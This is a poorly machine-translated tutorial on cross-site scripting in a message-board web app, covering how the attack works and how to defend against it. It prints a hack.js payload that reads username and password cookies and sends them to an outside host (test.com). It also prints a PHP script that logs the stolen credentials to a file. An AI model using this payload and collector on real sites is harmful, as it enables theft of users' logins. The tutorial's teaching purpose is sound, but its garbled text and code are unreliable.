The AddElement () method is used to add a new message, while the Rendercomments () method is used to show the message list, and the Web page looks like this
Xss
Because we fully trust the user input, but some of the ulterior motives of the user will be like this input
So no matter who accesses this page when the console will output "Hey you is a fool fish!", if this is just a malicious little joke, some people do things are not cute, some users will use this vulnerability to steal user information, trick people to open malicious websites or download malicious programs, etc. Look at the simplest example.
Using XSS to steal user name passwords
Of course, this example is simple enough to attack almost any website, just to see how it works. We know that many landing interface has the ability to remember the user name, password to facilitate the next login, some sites are directly logged in clear text user name, password, malicious user registered account login after using simple tools to view the cookie structure name, if the site has an XSS vulnerability, It is easy to use JSONP to get the user name and password of other users.
A malicious user would enter this
Let's see what's hidden in http://test.com/hack.js.
var Username=cookiehelper.getcookie (' username '). Value;var password=cookiehelper.getcookie (' password '). Value;var Script =document.createelement (' script '); script.src= ' http://test.com/index.php?username= ' +username+ ' & Password= ' +password;document.body.appendchild (script);
A few simple JavaScript, get the user name password in the cookie, use JSONP to http://test.com/index.php
A GET request was sent
http://test.com/index.php
<?php if (!empty ($_get[' password ')) { $username =$_get[' username ']; $password =$_get[' password ']; try{ $path =$_server["Document_root"]. ' /password.txt '; $FP =fopen ($path, ' a '); Flock ($FP, lock_ex); Fwrite ($fp, "$username \ t $password \ r \ n"); Flock ($FP, lock_un); Fclose ($FP); } catch (Exception $e) { } }?>
This allows malicious users to steal information from users who access the message board.
How to prevent
The above demo is a very simple XSS attack, there are many hidden ways, but its core is the use of script injection, so our solution is very simple, do not trust the user input, the special word such as "<", ">" Escape, you can fundamentally prevent this problem, Of course, many solutions have specific limitations on XSS, such as the above practice in ASP. NET, Microsoft ValidateRequest automatically do XSS validation of form submission. But impossible, always some clever malicious users will go to our site to sabotage, to their own site is not at ease can see this XSS cross-site test code Daquan testing site is safe.
When a message pops up inside the system, just redirect the user to Showmessage.ashx? Msg= News is
Yes, like
Response.Redirect ("Showmessage.ashx? msg= user name cannot be empty! ");
We can detect the requested data, if there is < in the request data is considered a malicious request, prohibit
Submit. The disadvantage of ASPX is that this strategy is adopted by default if you are doing a programmer's forum
, programmers will not be able to post HTML code, so a better processing strategy is to put the user published
The content is displayed as is, not HTML. Use
Httputility.htmlencode can convert special characters such as <, >, and so on in a string to HTML display.
Characters, that is, not to <script> as a label to define the script, but as a "<script>" This will
To the content displayed directly on the page.
Modify the View post code, the context. Response.Write (line + "
XSS vulnerability for cross-site scripting attacks